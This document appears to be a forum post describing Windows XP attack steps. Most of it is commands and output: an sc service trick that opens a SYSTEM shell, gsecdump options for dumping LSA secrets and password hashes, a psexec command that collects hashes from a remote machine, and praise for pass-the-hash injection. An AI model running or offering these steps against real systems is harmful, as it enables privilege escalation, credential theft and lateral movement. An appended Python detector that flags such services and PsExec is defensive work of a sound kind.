To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners are really good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, or with gethash, don't actually need to be cracked at all; it is just a matter of using the tool. As the original article says, it doesn't matter whether the password is 4 characters or 127: once you have the hash, it's 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
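As an added defender-side example (not part of the original post or of the tools it quotes), the Python below flags the service pattern shown above from service definitions in the shape of the registry values under HKLM\SYSTEM\CurrentControlSet\Services: an ImagePath that runs cmd.exe, a Type with the interactive flag set, and the PSEXESVC service that PsExec installs. The sample records are constructed; the Type flag values are the Win32 SERVICE_* constants.

```python
import re

# Win32 service type flags (winsvc.h); "sc create ... type= own type= interact"
# produces Type = 0x10 | 0x100.
SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_INTERACTIVE_PROCESS = 0x100

# Constructed sample records modelled on the ImagePath / Type / ObjectName
# values under HKLM\SYSTEM\CurrentControlSet\Services\<name>. Illustrative only.
SAMPLE_SERVICES = {
    "shellcmdline": {"ImagePath": 'C:\\WINDOWS\\system32\\cmd.exe /K start',
                     "Type": SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
                     "ObjectName": "LocalSystem"},
    "PSEXESVC":     {"ImagePath": '%SystemRoot%\\PSEXESVC.exe',
                     "Type": SERVICE_WIN32_OWN_PROCESS,
                     "ObjectName": "LocalSystem"},
    "Spooler":      {"ImagePath": '%SystemRoot%\\System32\\spoolsv.exe',
                     "Type": SERVICE_WIN32_OWN_PROCESS,
                     "ObjectName": "LocalSystem"},
}

# Interactive shells / script hosts that have no business being a service image.
SHELL_IMAGES = re.compile(r"(^|\\)(cmd|powershell|pwsh|wscript|cscript)\.exe\b",
                          re.IGNORECASE)

def classify_service(name, svc):
    """Return the list of reasons a service definition looks like the trick above."""
    reasons = []
    if SHELL_IMAGES.search(svc.get("ImagePath", "")):
        reasons.append("ImagePath runs an interactive shell or script host")
    if svc.get("Type", 0) & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("Type has SERVICE_INTERACTIVE_PROCESS set")
    if name.upper() == "PSEXESVC":
        reasons.append("PsExec remote-execution service present")
    # Only worth noting the account when something else already fired.
    if reasons and svc.get("ObjectName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons

def suspicious_services(services):
    """Map service name -> reasons for every definition that raised a flag."""
    flagged = {}
    for name, svc in services.items():
        reasons = classify_service(name, svc)
        if reasons:
            flagged[name] = reasons
    return flagged

if __name__ == "__main__":
    for name, why in suspicious_services(SAMPLE_SERVICES).items():
        print(name, "->", "; ".join(why))
```

On a live host the same dictionary shape can be filled from `reg query HKLM\SYSTEM\CurrentControlSet\Services` output or from System log event 7045 records, which carry the same file name and account fields.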